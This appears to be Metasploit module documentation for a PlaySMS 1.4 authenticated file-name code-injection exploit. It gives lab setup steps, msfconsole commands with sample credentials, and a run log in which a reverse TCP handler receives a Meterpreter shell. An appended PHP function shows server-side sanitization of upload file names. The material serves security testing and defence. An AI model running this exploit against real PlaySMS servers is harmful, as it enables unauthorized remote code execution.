## Description

This module exploits a code injection vulnerability in an authenticated file upload feature of PlaySMS v1.4. The issue is caused by improper file name handling in the `sendfromfile.php` file: an authenticated user can upload a file and rename it so that the file name carries a malicious payload. Additional information and related vulnerabilities can be viewed on Exploit-DB [42044](https://www.exploit-db.com/exploits/42003/).

## Vulnerable Application

Available at [Exploit-DB](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz)

### Vulnerable Application Installation Setup

1. Download the application: `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
2. Extract it: `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
3. Move it into the web directory: `mv playsms-1.4/web/* /var/www/html/`
4. Create the config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
5. Change the owner: `chown -R www-data:www-data /var/www/html/`
6. Set the DB credentials in `config.php` and import `playsms-1.4/db/playsms.sql` into your playsms database.
7. Now visit: http://localhost/

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/playsms_filename_exec`
4. Do: `set rport `
5. Do: `set rhost `
6. Do: `set targeturi SecreTSMSgatwayLogin`
7. Do: `set username touhid`
8. Do: `set password diana`
9. Do: `check`
   ```
   [*] 10.22.1.10:80 The target appears to be vulnerable.
   ```
10. Do: `set lport `
11. Do: `set lhost `
12. Do: `exploit`
13. You should get a shell.

## Scenarios

### PlaySMS on Ubuntu Linux

```
msf exploit(multi/http/playsms_filename_exec) > run

[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2
[*] Trying to Login ......
[+] Authentication successful : [ touhid:diana ]
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc
[*] Trying to upload file with malicious Filename Field....
[*] Sending stage (37775 bytes) to 10.22.1.15
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530

meterpreter >
```
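The root cause above is that a client-supplied file name is trusted by the upload handler. The following PHP function is an added example of the server-side validation a defender would apply to that field; it is not PlaySMS's own code, and the extension allowlist, the `safe_upload_filename` name and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example (not PlaySMS code): validate a client-supplied upload file
// name before it is used anywhere on the server.
// Assumption: the upload feature only needs plain text/CSV files, so the
// allowlist below is illustrative, not PlaySMS's own policy.

const ALLOWED_EXTENSIONS = ['csv', 'txt'];

/**
 * Returns a safe file name derived from the client-supplied one, or null if
 * the name cannot be made safe. The result is a single path component made
 * only of [A-Za-z0-9._-] with an allowlisted extension.
 */
function safe_upload_filename(string $clientName): ?string
{
    // Drop any directory components the client sent (../ or absolute paths).
    $base = basename(str_replace('\\', '/', $clientName));

    // Reject names that are empty or consist only of dots.
    if ($base === '' || preg_match('/^\.+$/', $base)) {
        return null;
    }

    // Split off the final extension and check it against the allowlist.
    $dot = strrpos($base, '.');
    if ($dot === false) {
        return null;
    }
    $stem = substr($base, 0, $dot);
    $ext  = strtolower(substr($base, $dot + 1));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }

    // Replace anything outside the safe character set; refuse an empty stem.
    $stem = preg_replace('/[^A-Za-z0-9._-]+/', '_', $stem);
    $stem = trim($stem, '._');
    if ($stem === '') {
        return null;
    }

    return substr($stem, 0, 100) . '.' . $ext;
}

// Constructed inputs: an ordinary name, a traversal attempt, and names that
// carry characters an attacker would need for code injection.
foreach (['numbers.csv', '../../etc/passwd', 'a<?php ?>.txt', 'x;id.csv'] as $n) {
    var_dump(safe_upload_filename($n));
}
```

Even a sanitized name should never be interpolated into PHP code, templates or shell commands; the stronger pattern is to store the upload under a server-generated name and keep the sanitized client name only as display metadata.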